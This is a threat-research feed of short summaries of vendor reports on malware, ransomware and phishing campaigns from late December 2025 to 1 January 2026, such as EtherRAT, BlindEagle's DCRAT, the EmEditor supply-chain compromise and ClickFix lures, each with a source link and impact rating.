Threat Research Feed

2026-01-01
EtherRAT_Abuses_Ethereum_for_Fileless_C2
HIGH
Intel Source:
Sysdig
Intel Name:
EtherRAT_Abuses_Ethereum_for_Fileless_C2
Date of Scan:
2026-01-01
Impact:
HIGH
Summary:
Researchers at Sysdig have identified EtherRAT, a newly observed remote access trojan that abuses the Ethereum blockchain for command and control and is delivered through exploitation of the React2Shell vulnerability in Next.js applications. The malware operates in a fileless manner via Node.js, executing fully in memory to evade disk-based detection, and uses smart contract state changes to dynamically resolve active infrastructure for resilient C2 operations. Analysis uncovered five post-compromise modules: system reconnaissance that self-terminates on CIS-region locales; credential and cryptocurrency theft targeting wallet seed phrases, API keys, and cloud credentials; a self-propagating worm that scans and exploits additional vulnerable endpoints across internal and external networks; a web server hijacking component used for traffic redirection and monetization; and an SSH-based persistence mechanism using a hard-coded public key. Although initial assessment suggested a possible DPRK nexus, characteristics such as CIS locale exclusion and monetization-focused behavior align more closely with Russian-speaking threat actor tradecraft, indicating either shared tooling or deliberate false flagging.
Source: https://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2
2025-12-31
BlindEagle_Colombian_Gov_Spearphish_Uses_DCRAT
HIGH
Intel Source:
Zscaler Threatlabz
Intel Name:
BlindEagle_Colombian_Gov_Spearphish_Uses_DCRAT
Date of Scan:
2025-12-31
Impact:
HIGH
Summary:
Researchers at Zscaler ThreatLabz have identified a spear-phishing campaign attributed to the South American threat actor BlindEagle, targeting a Colombian government agency under the Ministry of Commerce, Industry and Tourism (MCIT). The campaign leveraged a compromised internal email account to distribute phishing messages containing an SVG attachment that redirected victims to a fraudulent judicial web portal. From there, victims were deceived into downloading a JavaScript file that initiated a file-less infection chain. This chain executed multiple obfuscated JavaScript stages and PowerShell commands to deploy the Caminho downloader, which ultimately delivered the DCRAT remote access trojan. The attack demonstrated multi-layered obfuscation, in-memory execution, and the use of legitimate services such as Discord for payload hosting. Caminho’s code contained Portuguese elements, suggesting origins within the Brazilian cybercriminal ecosystem.
Source: https://www.zscaler.com/blogs/security-research/blindeagle-targets-colombian-government-agency-caminho-and-dcrat#indicators-of-compromise--iocs-
2025-12-31
EmEditor_Compromise_Info_Stealing_Supply_Chain_Attack
HIGH
Intel Source:
Qianxin Threat Intelligence Center
Intel Name:
EmEditor_Compromise_Info_Stealing_Supply_Chain_Attack
Date of Scan:
2025-12-31
Impact:
HIGH
Summary:
Researchers at Qianxin Threat Intelligence Center have identified a significant software supply chain compromise impacting the official EmEditor installation packages between December 19 and 22, 2025. The attackers replaced legitimate MSI installers with malicious ones signed by a fake certificate, embedding a PowerShell-based information-stealing payload. Once executed, the malware harvested extensive system and credential data, including operating system details, browser information, VPN configurations, and user credentials across communication and productivity tools. It employed RSA encryption for stolen data and achieved persistence through a malicious Microsoft Edge extension masquerading as a legitimate cloud storage plugin.
Source: https://ti.qianxin.com/blog/articles/emeditor-supply-chain-incident-details-disclosed-en/
2025-12-30
Silver_Fox_India_Tax_Phishing_Valley_RAT
HIGH
Intel Source:
Cloudsek
Intel Name:
Silver_Fox_India_Tax_Phishing_Valley_RAT
Date of Scan:
2025-12-30
Impact:
HIGH
Summary:
CloudSEK reports a targeted phishing campaign attributed to the Chinese Silver Fox APT abusing India Income Tax–themed lures to gain initial access. Rather than deploying an overtly malicious executable, the operation relies on a convincing PDF decoy that redirects victims to download an installer masquerading as legitimate tax-related content. Once launched, the installer abuses a signed third-party binary to sideload a malicious DLL, allowing execution to blend into normal Windows activity. The loader performs anti-debugging and sandbox checks before decrypting and executing payloads entirely in memory. The infection chain culminates in the deployment of Valley RAT, a modular backdoor designed for long-term, low-noise persistence. Valley RAT uses delayed beaconing, protocol switching, and three-tier command-and-control failover to evade detection and blocking. Registry-based storage enables operators to update C2 infrastructure and deploy new plugins without redeploying malware. The campaign’s victimology, infrastructure, and tooling contradict earlier attribution to India-aligned actors and instead align with known Silver Fox tradecraft. The impact is sustained access with capabilities for credential theft, surveillance, and lateral movement.
Source: https://www.cloudsek.com/blog/silver-fox-targeting-india-using-tax-themed-phishing-lures#iocs
2025-12-29
DNS_Poisoning_Delivers_MgBot
MEDIUM
Intel Source:
Securelist
Intel Name:
DNS_Poisoning_Delivers_MgBot
Date of Scan:
2025-12-29
Impact:
MEDIUM
Summary:
Researchers at Securelist have uncovered a highly targeted campaign by the Evasive Panda threat group, also known as Bronze Highland, Daggerfly, or StormBamboo, that quietly delivers malware by manipulating DNS responses. The campaign relies on victim-specific delivery, with each infection carefully tailored to reduce detection and complicate analysis. The attack impersonates legitimate software updates for widely used applications, allowing it to blend seamlessly into normal user activity. Malware is delivered in multiple stages and proceeds only when specific conditions are met, helping it evade automated defenses. Its components are encrypted, bound to the infected system, and often executed directly in memory or injected into trusted processes to remain hidden. The final payload identified is MgBot, highlighting the group’s focus on long-term remote access and persistent control rather than immediate disruption.
Source: https://securelist.com/evasive-panda-apt/118576/
2025-12-29
Russian_Espionage_Campaign_Abuses_Viber_Messages
HIGH
Intel Source:
360 Threat Intelligence Center
Intel Name:
Russian_Espionage_Campaign_Abuses_Viber_Messages
Date of Scan:
2025-12-29
Impact:
HIGH
Summary:
Researchers at the 360 Threat Intelligence Center have observed UAC-0184, also known as Hive0156, a Russian state-aligned cyber-espionage group, targeting Ukrainian military and government entities through a campaign dubbed "The Dark Side of the Fallen Files." The campaign leverages the Viber messaging platform to deliver malicious ZIP archives containing shortcut files and PowerShell scripts disguised as official Ukrainian parliament correspondence and themed around sensitive military and administrative topics to socially engineer recipients. Once executed, the infection chain retrieves secondary payloads, including HijackLoader, which ultimately deploys the Remcos remote access trojan through a multi-stage process involving DLL side-loading, module stomping, unconventional control flow, and dynamic shellcode decryption to evade detection. HijackLoader performs security product reconnaissance, disables built-in protections, establishes persistence via scheduled tasks, and obscures execution.
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507757&idx=1&sn=cf6b118e88395af45a000aae80811264&poc_token=HFVIUmmjA1Fa1PlHP1hqdS28HznjEUfHODrHwWqV
2025-12-28
npm_Spearphishing_Document_Lures_AiTM
HIGH
Intel Source:
Socket
Intel Name:
npm_Spearphishing_Document_Lures_AiTM
Date of Scan:
2025-12-28
Impact:
HIGH
Summary:
Researchers from the Socket Threat Research Team uncovered a sustained spearphishing campaign that abuses the npm registry as durable hosting for browser-based phishing lures. Instead of compromising developers through malicious dependencies, the actor repurposes npm packages as web-delivered phishing components that execute directly in the victim’s browser. The operation ran for at least five months and involved 27 malicious packages published under multiple aliases. These packages impersonate secure document-sharing portals and Microsoft sign-in pages, with the victim’s email address prefilled to increase credibility. The campaign is highly targeted, focusing on sales and commercial staff at manufacturing, industrial automation, plastics, and healthcare organizations. Once the lure is opened, client-side JavaScript replaces page content and guides the victim through a staged verification flow. Lightweight anti-analysis controls, including bot detection, honeypot form fields, and interaction gating, are used to evade scanners. Credential submission redirects victims to threat actor-controlled infrastructure associated with adversary-in-the-middle techniques. In some cases, the infrastructure overlaps with Evilginx-style patterns capable of stealing session cookies and bypassing MFA. The impact is credential compromise with potential downstream account takeover rather than endpoint malware infection.
Source: https://socket.dev/blog/spearphishing-campaign-abuses-npm-registry?utm_medium=feed
2025-12-28
A_Deployment_of_CoinMiner_Payloads
MEDIUM
Intel Source:
Asec
Intel Name:
A_Deployment_of_CoinMiner_Payloads
Date of Scan:
2025-12-28
Impact:
MEDIUM
Summary:
Researchers at ASEC have uncovered multiple campaigns that exploit a GeoServer remote code execution vulnerability (CVE-2024-36401) to install cryptocurrency miners on exposed servers. The attackers scan the internet for vulnerable GeoServer deployments rather than targeting specific organizations. Once access is gained, the attackers deploy XMRig-based CoinMiner payloads to hijack system resources for cryptomining. In some cases, they use multi-stage PowerShell and Bash scripts, including droppers delivered via certutil and downloaders that can run payloads directly in memory. The attackers also try to weaken host defenses by adding Windows Defender exclusions and disabling security settings to keep their access longer.
Source: https://asec.ahnlab.com/en/91724/
2025-12-27
Webrat_GitHub_Exploit_Lure_Backdoor
MEDIUM
Intel Source:
Securelist
Intel Name:
Webrat_GitHub_Exploit_Lure_Backdoor
Date of Scan:
2025-12-27
Impact:
MEDIUM
Summary:
Researchers from Securelist have uncovered a Webrat campaign that shifts distribution from game cheats and cracked software to fake exploits hosted on GitHub repositories. Instead of targeting casual users, the attackers now focus on students and inexperienced security professionals by disguising malware as proof-of-concept exploits for high-profile vulnerabilities. The repositories are carefully crafted with AI-generated vulnerability descriptions and realistic mitigation guidance to appear legitimate. Victims are lured into downloading password-protected archives that contain a decoy file alongside a malicious loader. Once executed, the loader escalates privileges, disables Windows Defender, and retrieves the Webrat backdoor from a remote server. The end goal is persistent system access and data theft, including credentials, messaging accounts, and surveillance via keylogging and media capture.
Source: https://securelist.com/webrat-distributed-via-github/118555/
2025-12-27
Tax_Themed_Phish_NSIS_RAT_Fake_ITD
HIGH
Intel Source:
Seqrite
Intel Name:
Tax_Themed_Phish_NSIS_RAT_Fake_ITD
Date of Scan:
2025-12-27
Impact:
HIGH
Summary:
Researchers from Seqrite have uncovered a tax-themed phishing campaign targeting Indian businesses that impersonates the Indian Income Tax Department to deliver a remote access malware payload. The attack begins with spearphishing emails using urgent compliance lures that direct victims to a fraudulent tax portal hosting a malicious ZIP archive. When executed, the archive launches a multi-stage NSIS installer chain that drops and executes a hidden RAT component while attempting to weaken local security controls. The malware establishes persistence by registering a Windows service disguised as a legitimate system protection service. It then performs system reconnaissance, collects host and software information, and registers the infected device with attacker-controlled infrastructure. The implant communicates with its command-and-control servers over multiple ports, enabling remote command execution and follow-on activity. The campaign emphasizes persistence and operational control, posing significant risk to affected organizations through sustained endpoint compromise.
Source: https://www.seqrite.com/blog/indian-income-tax-themed-phishing-campaign-targets-local-businesses/
2025-12-26
Phantom_Shuttle_Malicious_Chrome_VPN
HIGH
Intel Source:
Socket
Intel Name:
Phantom_Shuttle_Malicious_Chrome_VPN
Date of Scan:
2025-12-26
Impact:
HIGH
Summary:
Researchers from Socket have uncovered a long-running malicious Chrome extension campaign tracked as Phantom Shuttle that masquerades as a legitimate VPN and network testing tool. The activity targets developers and foreign trade workers through professionally branded Chrome Web Store listings and a paid subscription model that builds trust and reduces suspicion. The extensions abuse Chrome proxy and authentication APIs to silently inject hardcoded credentials, placing victims in an adversary-in-the-middle position and routing traffic through attacker-controlled infrastructure. The report details how the extensions continuously exfiltrate user emails and passwords via periodic heartbeat communications while selectively proxying high-value domains such as cloud services and developer platforms. This operation has remained active since at least 2017, posing significant credential theft and downstream enterprise and supply-chain risk.
Source: https://socket.dev/blog/malicious-chrome-extensions-phantom-shuttle?utm_medium=feed
2025-12-26
EtherRAT_React2Shell_Exploit_Distribution
HIGH
Intel Source:
AhnLab Security Intelligence Center
Intel Name:
EtherRAT_React2Shell_Exploit_Distribution
Date of Scan:
2025-12-26
Impact:
HIGH
Summary:
ASEC reports an active campaign exploiting the React2Shell vulnerability (CVE-2025-55182) to deploy EtherRAT via automated scanning of exposed React/Next.js servers. The multi-stage Node.js infection chain installs a RAT capable of command execution, credential and cryptocurrency theft, SSH key persistence, and propagation. EtherRAT uniquely resolves its C2 through Ethereum smart contract queries, indicating higher operational sophistication. The activity is opportunistic and high impact, enabling persistent access and financial theft.
Source: https://asec.ahnlab.com/en/91658/
2025-12-25
Repeated_IIS_Intrusions_Lead_to_Malware_Access
LOW
Intel Source:
Huntress
Intel Name:
Repeated_IIS_Intrusions_Lead_to_Malware_Access
Date of Scan:
2025-12-25
Impact:
LOW
Summary:
Researchers from Huntress have uncovered three intrusions in which a threat actor repeatedly failed and retried actions until malware execution and persistence partially succeeded. In each case, the activity originated from Microsoft IIS web servers, with commands executed under the IIS worker process. The actor relied on basic but effective techniques, including system enumeration, downloading and launching files using built-in Windows utilities, and repeatedly attempting to run the same payloads after initial failures. In later stages, they attempted to weaken defenses by adding Microsoft Defender exclusions and attempted to establish persistence by creating a Windows service, although some efforts failed due to misconfiguration. The affected victims included a development firm, a manufacturing organization, and an enterprise shared services provider, indicating broad and opportunistic targeting rather than a focus on a specific industry.
Source: https://www.huntress.com/blog/trial-error-typos-malware-attacks-sophisticated
2025-12-25
Shared_Lazarus_Kimsuky_Attack_Infrastructure
HIGH
Intel Source:
Hunt.IO
Intel Name:
Shared_Lazarus_Kimsuky_Attack_Infrastructure
Date of Scan:
2025-12-25
Impact:
HIGH
Summary:
Researchers from Hunt.io and Acronis Threat Research identified a campaign linked to the North Korea–aligned groups Lazarus and Kimsuky by analysing how their infrastructure is reused across operations, rather than focusing on a single malware. The report shows that the same servers, certificates, ports, and hosting choices appear again and again, revealing consistent operator behavior. The researchers also uncovered open directories exposing credential-stealing tools, repeated use of tunneling and proxy services, and infrastructure that supports remote access and command-and-control activity. The analysis links the Lazarus group to a Linux backdoor called Badcall and its supporting hosting environment, while another part of the analysis highlights open directories filled with mixed toolsets for credential theft, data exfiltration, and remote administration. Overall, the activity suggests the actors can quickly scale and redeploy proxy nodes across multiple VPS providers with minimal effort.
Source: https://hunt.io/blog/dprk-lazarus-kimsuky-infrastructure-uncovered
2025-12-24
Ink_Dragon_Espionage_Campaign
HIGH
Intel Source:
CheckPoint
Intel Name:
Ink_Dragon_Espionage_Campaign
Date of Scan:
2025-12-24
Impact:
HIGH
Summary:
Check Point researchers have identified an espionage campaign conducted by the PRC-aligned threat actor Ink Dragon, also tracked as CL-STA-0049, Earth Alux, and REF7707. The group primarily targets government, telecommunications, and other public-sector organizations across Southeast Asia, South America, Africa, and Europe. Initial access is typically achieved by exploiting ASP.NET ViewState deserialization vulnerabilities on exposed IIS and SharePoint servers, as well as the SharePoint ToolShell vulnerability, enabling remote code execution without user interaction. After gaining access, the actors rapidly escalate privileges, harvest credentials and authentication tokens, and pivot laterally by abusing administrative RDP sessions. They deploy ShadowPad and FinalDraft malware to establish C2, move laterally across Windows environments, and exfiltrate sensitive data. Throughout the campaign, Ink Dragon consistently abuses legitimate digital signatures and disguises malicious binaries as native Windows components to evade detection and blend into normal system activity.
Source: https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/
2025-12-24
MacSync_Stealer
MEDIUM
Intel Source:
Jamf
Intel Name:
MacSync_Stealer
Date of Scan:
2025-12-24
Impact:
MEDIUM
Summary:
Researchers from Jamf Threat Labs have uncovered a MacSync Stealer campaign that marks a shift from earlier user-driven infection methods to a quieter, more automated approach on macOS. Instead of relying on ClickFix tricks or forcing users to paste commands into Terminal, the attackers now distribute a code-signed and notarized Swift application inside a disk image that looks legitimate and includes decoy content to appear trustworthy. Once launched, the app silently fetches an encoded script from a remote server and runs it using a built-in helper, with no further user interaction. The malware checks its environment and internet connectivity before proceeding, limits how often it can run, and lightly validates downloaded content to avoid errors and reduce suspicion. By minimizing warnings and user prompts, the campaign supports stealthy execution, with the end goal of infostealer activity such as stealing credentials and sensitive data from macOS systems.
Source: https://www.jamf.com/blog/macsync-stealer-evolution-code-signed-swift-malware-analysis/
2025-12-24
ConsentFix_A_New_Phishing_Attack_Technique
MEDIUM
Intel Source:
Push Security
Intel Name:
ConsentFix_A_New_Phishing_Attack_Technique
Date of Scan:
2025-12-24
Impact:
MEDIUM
Summary:
Researchers at Push Security have identified ConsentFix, a browser-native phishing technique that abuses OAuth consent flows combined with ClickFix-style user interaction to compromise Microsoft cloud accounts without requiring passwords or MFA prompts. Victims are lured via search results to compromised or malicious websites that masquerade as routine security checks and guide users to complete a legitimate Microsoft sign-in in a separate tab. By tricking users into copying authorization data from the browser address bar back into the lure page, attackers can redeem OAuth tokens using Azure command-line tooling. This enables control over the victim’s Microsoft identity and associated resources while relying solely on standard cloud application workflows. The attack operates entirely within the browser, evades many endpoint and email-based defenses, and uses selective targeting and anti-analysis measures to reduce detection.
Source: https://pushsecurity.com/blog/consentfix#id-recommendations_id-iocs
2025-12-23
SantaStealer_Emerging_Infostealer_Malware
MEDIUM
Intel Source:
Rapid7 Labs
Intel Name:
SantaStealer_Emerging_Infostealer_Malware
Date of Scan:
2025-12-23
Impact:
MEDIUM
Summary:
Researchers at Rapid7 Labs have identified SantaStealer, a newly emerging infostealer malware being actively marketed on underground forums and Telegram channels as part of a growing infostealer-as-a-service ecosystem. The malware is currently under development and offered in subscription-based tiers that advertise advanced anti-analysis and stealth features, although technical examination suggests these claims are not yet fully realized. SantaStealer is designed to collect credentials, browser data, crypto wallet information, and system artifacts from Windows environments, employing techniques such as reflective DLL loading, in-memory execution, and the ChaCha20 encryption algorithm to obfuscate its activity. The stealer’s modular framework and web-based control panel allow operators to customize payloads, manage infected hosts, and test files for antivirus detection. Uniquely, SantaStealer provides an option to exclude victims in the Commonwealth of Independent States (CIS), indicating targeting preferences consistent with actors from Russian-speaking regions. The malware’s use of a web panel hosted under a .su domain, coupled with its rapid feature development and commercialization, points to an organized criminal operation seeking to capture market share within the commodity infostealer landscape.
Source: https://www.rapid7.com/blog/post/tr-santastealer-is-coming-to-town-a-new-ambitious-infostealer-advertised-on-underground-forums/
2025-12-23
Targeted_Email_Campaigns
MEDIUM
Intel Source:
Cyble
Intel Name:
Targeted_Email_Campaigns
Date of Scan:
2025-12-23
Impact:
MEDIUM
Summary:
Researchers from Cyble have uncovered a targeted email campaign that uses a multi-stage loader to deliver malware, including remote access trojans and information stealers. The attack begins with spear-phishing emails disguised as purchase order communications, in which malicious attachments trigger scripts that download and execute additional components. To evade detection, the loader employs heavy obfuscation, execution delays, and in-memory loading to minimize forensic artifacts on the system. The campaign also conceals malicious code within image files using steganography and weaponizes legitimate open-source libraries by appending malicious code while keeping their expected functionality. The final payload injects itself into a trusted Windows process to blend in with legitimate activity and focuses on stealing credentials and sensitive data. Overall, the campaign primarily targets industrial organizations, with the goal of harvesting sensitive information and credentials for further compromise.
Source: https://cyble.com/blog/stealth-in-layers-unmasking-loader-in-targeted-email-campaigns/
2025-12-22
Arkanix_Stealer_Discord_Infostealer
HIGH
Intel Source:
Dexpose
Intel Name:
Arkanix_Stealer_Discord_Infostealer
Date of Scan:
2025-12-22
Impact:
HIGH
Summary:
Researchers from DeXpose have identified an actively developed infostealer campaign centered around Arkanix Stealer, which is primarily marketed and distributed through Discord and underground forums. The malware is disguised as legitimate tools, enticing users to execute the payload on Windows systems. Once launched, Arkanix bypasses core Windows security controls, including AMSI and ETW, using in-memory patching to evade detection. It employs strong anti-analysis and anti-VM checks to limit execution in sandboxed environments. The stealer then harvests a wide range of sensitive data, including browser credentials, cryptocurrency wallets, VPN accounts, Discord tokens, WiFi credentials, and system metadata. Collected data is compressed and exfiltrated to attacker-controlled infrastructure hidden behind Cloudflare, enabling scalable and stealthy credential theft operations.
Source: https://www.dexpose.io/deep-dive-into-arkanix-stealer-and-its-infrastructure/
2025-12-22
LongNosedGoblin_Targets_Asian_Governments
HIGH
Intel Source:
ESET
Intel Name:
LongNosedGoblin_Targets_Asian_Governments
Date of Scan:
2025-12-22
Impact:
HIGH
Summary:
Researchers at ESET identified a previously undocumented, China-aligned advanced persistent threat group named LongNosedGoblin, active since at least September 2023 and focused on cyberespionage against government institutions in Southeast Asia and Japan. The group seeks to exfiltrate sensitive information through sustained campaigns, with a distinctive tactic of abusing Windows Group Policy to enable lateral movement and large-scale malware deployment across compromised environments. Its toolkit consists mainly of custom C# and .NET malware, including components for browser history collection, multi-stage backdoor access, credential and data theft via cloud platforms, PowerShell-based payload delivery, and encrypted keystroke logging, supported by advanced execution methods such as AppDomainManager injection and AMSI bypass for evasion. Investigations also revealed the use of living-off-the-land binaries and execution guardrails to restrict activity to intended victims, along with indications of possible tool sharing with other China-aligned groups, despite clear differences in tactics and techniques. Activity observed again in September 2025 showed continued use of similar methods and abuse of common cloud services as covert command-and-control channels, reinforcing assessments that LongNosedGoblin operates with moderate to high sophistication in support of long-term intelligence collection tied to regional government affairs.
Source: https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/
2025-12-21
Paper_Werewolf_Campaign
MEDIUM
Intel Source:
Intezer
Intel Name:
Paper_Werewolf_Campaign
Date of Scan:
2025-12-21
Impact:
MEDIUM
Summary:
Researchers from Intezer have uncovered a Paper Werewolf (also known as GOFFEE) campaign that leverages malicious Excel XLL add-ins and AI-generated decoy documents to deploy a new backdoor, dubbed EchoGather. The operation relies on social engineering and user interaction, with execution techniques designed to delay activity, evade sandbox detection, and minimize visible indicators of compromise. Once established, EchoGather collects basic system and user information and maintains periodic communication with its C2 servers over encrypted web traffic. The backdoor also supports remote command execution and file exfiltration. The decoy content is crafted to resemble official Russian-language documents and invitations, and the identified victims include Russian organizations associated with defense and industrial sectors, indicating an intelligence-gathering campaign.
Source: https://intezer.com/blog/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/
2025-12-20
Deployment_of_StealC_and_Qilin_Payloads_Through_Clickfix
MEDIUM
Intel Source:
Sophos
Intel Name:
Deployment_of_StealC_and_Qilin_Payloads_Through_Clickfix
Date of Scan:
2025-12-20
Impact:
MEDIUM
Summary:
Researchers from Sophos have uncovered a campaign that leverages fake “ClickFix” human-verification prompts to trick users into executing a malicious script, ultimately leading to infostealer infection and ransomware deployment. The attack begins on a compromised but legitimate website that delivers a malicious script and presents a highly convincing verification workflow. When users follow the on-screen instructions, a legitimate remote access tool is installed and then abused to establish remote control of the system. From this foothold, the attackers deploy additional payloads, including the StealC V2 infostealer via DLL sideloading, followed by Qilin ransomware, showing that the intrusion escalated from initial access to ransomware deployment. Stolen credentials were also used to access VPN devices, suggesting that the infostealer-derived access was likely sold or handed off to a Qilin affiliate.
Source: https://www.sophos.com/en-us/blog/i-am-not-a-robot-clickfix-used-to-deploy-stealc-and-qilin
2025-12-20
APT36_LNK_Based_Malware_Campaign
MEDIUM
Intel Source:
Cyfirma
Intel Name:
APT36_LNK_Based_Malware_Campaign
Date of Scan:
2025-12-20
Impact:
MEDIUM
Summary:
Researchers from Cyfirma have uncovered a targeted malware campaign attributed to APT36 that uses social engineering to trick users into opening a malicious Windows shortcut disguised as a PDF advisory. The attack abuses default Windows behavior that hides file extensions, making the shortcut appear benign. When executed, it silently runs an obfuscated command that downloads and installs a remote MSI file. This MSI acts as a loader for a multi-stage infection chain, deploying a .NET-based loader along with additional malicious components. To avoid suspicion, a decoy document is displayed while the malware executes in the background. The payload establishes persistence through registry modifications, enabling it to survive system reboots, and provides C2 functionality for remote command execution. It also collects basic system information, such as installed antivirus products, and performs checks to evade virtualized or sandboxed environments.
Source: https://www.cyfirma.com/research/apt36-lnk-based-malware-campaign-leveraging-msi-payload-delivery/
2025-12-19
RansomHouse_RaaS_Operation
HIGH
Intel Source:
Unit42
Intel Name:
RansomHouse_RaaS_Operation
Date of Scan:
2025-12-19
Impact:
HIGH
Summary:
Researchers at Unit 42 have identified a new ransomware-as-a-service (RaaS) operation known as RansomHouse, attributed to a threat group they track as Jolly Scorpius, which primarily targets VMware ESXi environments. The group employs a double-extortion model, combining large-scale data theft with encryption and threats to leak or sell stolen data. Activity on its data-leak site indicates a growing focus on high-value organizations across healthcare, finance, transportation, and government sectors, reflecting an emphasis on victims holding sensitive and monetizable information. RansomHouse leverages a modular toolset, including MrAgent, an ESXi management and deployment utility that maintains persistent C2 access, collects host and network details, and can disable the ESXi firewall, and Mario, a hypervisor-level ransomware payload that encrypts virtualization-related files across multiple virtual machines, drops ransom notes, and reports detailed encryption statistics.
Source: https://unit42.paloaltonetworks.com/ransomhouse-encryption-upgrade/
2025-12-19
Malicious_Domain_Parking_Ecosystem
HIGH
Intel Source:
Infoblox
Intel Name:
Malicious_Domain_Parking_Ecosystem
Date of Scan:
2025-12-19
Impact:
HIGH
Summary:
Researchers at Infoblox Threat Intel have identified widespread abuse of the domain parking and direct search advertising ecosystem, where cyber actors monetize mistyped or abandoned domains to deliver malicious content and redirect users to harmful destinations. The investigation revealed that parked and lookalike domains, traditionally considered benign, are increasingly being leveraged as part of sophisticated malvertising and traffic distribution operations. Threat actors use advanced techniques such as DNS fast flux, GeoIP-based fingerprinting, and selective redirection to evade detection and deliver payloads including information stealers, spyware, and trojans through advertising networks. These operations are supported by large domain portfolios that impersonate major brands and exploit user errors in DNS resolution or browser navigation. The malicious ecosystem involves multiple intermediaries, including advertisers and traffic brokers, who resell visitor data and redirect chains to malware delivery systems. This convergence of legitimate ad infrastructure and malicious manipulation blurs attribution and complicates mitigation.
Source: https://blogs.infoblox.com/threat-intelligence/parked-domains-become-weapons-with-direct-search-advertising/
2025-12-19
UAT_9686_Targeting_Cisco_AsyncOS_Software
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
UAT_9686_Targeting_Cisco_AsyncOS_Software
Date of Scan:
2025-12-19
Impact:
MEDIUM
Summary:
Researchers at Cisco Talos have identified an ongoing cyber-espionage campaign targeting Cisco AsyncOS appliances used by Cisco Secure Email Gateway and Cisco Secure Email and Web Manager. The activity, tracked as UAT-9686 and assessed with moderate confidence to be linked to a China-aligned APT, has been active since at least late November 2025. After gaining initial access, the attackers deploy a custom backdoor called AquaShell, which is embedded within an existing Python-based web server file and enables unauthenticated remote command execution via crafted web requests. The campaign also employs tunneling tools to maintain persistent access to attacker-controlled infrastructure, including reverse-SSH–like functionality and generic TCP/UDP tunneling. To evade detection, the attackers use a log-cleaning utility known as AquaPurge to remove evidence of their activity from system logs.
Source: https://blog.talosintelligence.com/uat-9686/
2025-12-19
Phantom_Information_Stealer
MEDIUM
Intel Source:
K7 Labs
Intel Name:
Phantom_Information_Stealer
Date of Scan:
2025-12-19
Impact:
MEDIUM
Summary:
Researchers at K7 Labs have identified Phantom 3.5, a .NET-based information-stealing malware distributed via a trojanized “Adobe 1.17.7” installer hosted on cracked software sites. The installer initiates a PowerShell-based multi-stage infection chain that decrypts and loads additional .NET components entirely in memory. A loader component, tracked as BLACKHAX, performs process injection by hijacking an Agent_Compiler executable and injecting the final stealer payload into selected processes. The malware uses RC4-encrypted payloads, in-memory .NET assembly loading, and process hollowing to make detection harder. Once established, Phantom 3.5 establishes persistence through registry run keys and scheduled tasks and conducts environment checks to evade sandboxing and security controls. The stealer is capable of harvesting browser data, credentials, cookies, autofill and credit card information, files, desktop and browser-based wallets, clipboard contents, system information, and stored Wi-Fi passwords. It also includes keylogging functionality and can extract credentials from multiple applications, including browsers, email clients, file-transfer tools, and other local credential stores. For data exfiltration, the malware packages stolen information and transmits it via SMTP as well as alternative channels such as FTP, Discord, and Telegram.
Source: https://labs.k7computing.com/index.php/phantom-3-5-initial-vector-analysis-forensics/
2025-12-18
ForumTroll_Academic_Phishing_Campaign
MEDIUM
Intel Source:
Securelist
Intel Name:
ForumTroll_Academic_Phishing_Campaign
Date of Scan:
2025-12-18
Impact:
MEDIUM
Summary:
Researchers at Kaspersky’s Global Research and Analysis Team (GReAT) have identified a renewed cyber-espionage campaign conducted by the ForumTroll APT group, targeting political scientists and academics in Russia. The operation represents a continuation of the group’s earlier 2025 activities but with a shift from exploiting browser vulnerabilities to using highly tailored phishing emails. These emails impersonated a well-known Russian electronic library and were crafted to appear as plagiarism notifications, deceiving recipients into downloading malicious archives. Each archive contained a shortcut file that executed a PowerShell script designed to retrieve and install a secondary payload, ultimately delivering a remote access framework known as Tuoni. The attackers employed COM hijacking for persistence and relied on cloud-based content delivery infrastructure for command-and-control communication, demonstrating technical competence and operational discipline.
Source: https://securelist.com/operation-forumtroll-new-targeted-campaign/118492/
2025-12-18
GhostPoster_Malware_Hiding_in_Firefox_Extensions
HIGH
Intel Source:
Koi Research
Intel Name:
GhostPoster_Malware_Hiding_in_Firefox_Extensions
Date of Scan:
2025-12-18
Impact:
HIGH
Summary:
Researchers at Koi Research have uncovered GhostPoster, a coordinated malicious campaign abusing Firefox browser extensions to deliver multi-stage malware through PNG image steganography. The campaign is centered on a rogue free VPN extension active since September 2025 and 16 related add-ons that together amassed over 50,000 installs. The extensions hid JavaScript payloads inside image logo files, extracting a loader at runtime that contacted external command-and-control infrastructure to fetch encrypted payloads executed in memory. This enabled monetization-focused activity such as affiliate hijacking, browser security header stripping, tracking injection, CAPTCHA bypass, and hidden iframe insertion for click fraud, while evading detection through delayed activation, randomized check-ins, XOR encryption, and runtime-only execution.
Source: https://www.koi.ai/blog/inside-ghostposter-how-a-png-icon-infected-50-000-firefox-browser-users#heading-9
2025-12-18
DarkGate_ClickFix_Social_Engineering_Chain
HIGH
Intel Source:
Point Wild
Intel Name:
DarkGate_ClickFix_Social_Engineering_Chain
Date of Scan:
2025-12-18
Impact:
HIGH
Summary:
Researchers at Point Wild’s Lat61 Threat Intelligence Team have identified a sophisticated infection chain leveraging a technique dubbed ClickFix to deliver the DarkGate malware. This campaign exploits human behavior rather than software vulnerabilities, deceiving users into executing PowerShell commands under the guise of troubleshooting or browser extension fixes. The attack sequence involves multilayered scripts hidden within HTML content that decode and execute PowerShell payloads, leading to the retrieval of additional components. These payloads are designed to establish remote access, deploy secondary binaries, and enable full system compromise. The operation demonstrates advanced evasion tactics, including script obfuscation, Base64 encoding, and the use of legitimate scripting frameworks to disguise malicious intent.
Source: https://www.pointwild.com/threat-intelligence/clickfix-darkgate
2025-12-17
Gentlemen_Ransomware_Global_Dual_Extortion_Surge
HIGH
Intel Source:
ASEC
Intel Name:
Gentlemen_Ransomware_Global_Dual_Extortion_Surge
Date of Scan:
2025-12-17
Impact:
HIGH
Summary:
Researchers at ASEC have identified a new ransomware group known as Gentlemen, first observed in August 2025. The group employs a double extortion model, breaching enterprise networks to exfiltrate and encrypt sensitive data before using it for leverage against victims. Written in the Go programming language, the ransomware demonstrates a high level of sophistication through features such as disabling security services, halting backup and database processes, and leveraging Group Policy Object (GPO) manipulation during lateral movement. Execution is restricted via a password argument to prevent analysis in unintended environments, indicating strong operational discipline.
Source: https://asec.ahnlab.com/en/91545/
2025-12-17
